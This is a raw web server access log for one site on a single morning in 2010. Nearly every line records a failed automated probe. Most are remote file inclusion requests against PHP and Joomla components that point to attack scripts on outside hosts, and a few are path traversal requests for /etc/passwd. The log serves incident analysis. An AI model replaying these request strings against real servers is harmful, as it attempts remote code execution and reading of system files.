58.150.99.144 - - [15/Feb/2010:07:05:27 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:07:05:31 -0800] "GET /logs/access_100115.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:07:05:32 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:05:47 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:05:49 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:05:49 -0800] "GET /logs/access_100116.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:07:06:02 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:07:06:03 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:07:06:03 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:06:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:06:10 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:06:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:06:10 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:06:15 -0800] "GET /logs/access_100111.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:06:24 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:07:06:25 -0800] "GET /logs/access_100125.log/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:07:06:33 -0800] "GET /functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:07:06:33 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:07:06:35 -0800] "GET /logs/access.log//functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:07:35 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
221.143.46.124 - - [15/Feb/2010:07:08:22 -0800] "GET /logs/access_100112.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:09:29 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:40 -0800] "GET /logs/access_100125.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:41 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:41 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:09:45 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:09:45 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:45 -0800] "GET /logs/access_100125.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:46 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:46 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:47 -0800] "GET /logs/access_100202.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:09:55 -0800] "GET /logs/access_100202.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:10:15 -0800] "GET /logs/access_100104.log//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:10:19 -0800] "GET /logs/access_100104.log//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:10:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:10:58 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:10:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:11:26 -0800] "GET /gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:11:26 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:11:28 -0800] "GET /logs//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:52 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:53 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:13:54 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:02 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:07:14:14 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:07:14:14 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:07:14:14 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:14:19 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:14:34 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:14:58 -0800] "GET /logs/access_100111.log%20%20/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:14:58 -0800] "GET /logs/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:14:58 -0800] "GET ////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:15:20 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:15:20 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:15:20 -0800] "GET /logs/access_100119.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:15:31 -0800] "GET /logs/access_100121.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:15:44 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:15:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:15:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:16:06 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:16:06 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:16:06 -0800] "GET /logs/access_100119.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:16:08 -0800] "GET ////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:16:08 -0800] "GET /logs/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:16:08 -0800] "GET /logs/access_100111.log%20%20/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:16:14 -0800] "GET /logs/access_100121.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:16:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:16:16 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:16:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:07:17:17 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:07:17:33 -0800] "GET /logs/access_100109.log//functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:17:44 -0800] "GET /logs/access_100104.log/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:17:44 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:17:45 -0800] "GET /logs/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:17:53 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:17:53 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:17:53 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:18:00 -0800] "GET /logs/access_100103.log%20%20/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:18:15 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:19:07 -0800] "GET /logs/access_100103.log%20%20/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:19:08 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:19:08 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:19:10 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:19:57 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:19:58 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:19:58 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:20:20 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:20:24 -0800] "GET /logs/access_100111.log/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:20:25 -0800] "GET /logs/access_100103.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:20:31 -0800] "GET /logs/access_100131.log/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:20:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:04 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:04 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:04 -0800] "GET /logs/access_100115.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:21:08 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:21:11 -0800] "GET /logs//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:21:12 -0800] "GET /gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:12 -0800] "GET /logs/access_100103.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:28 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
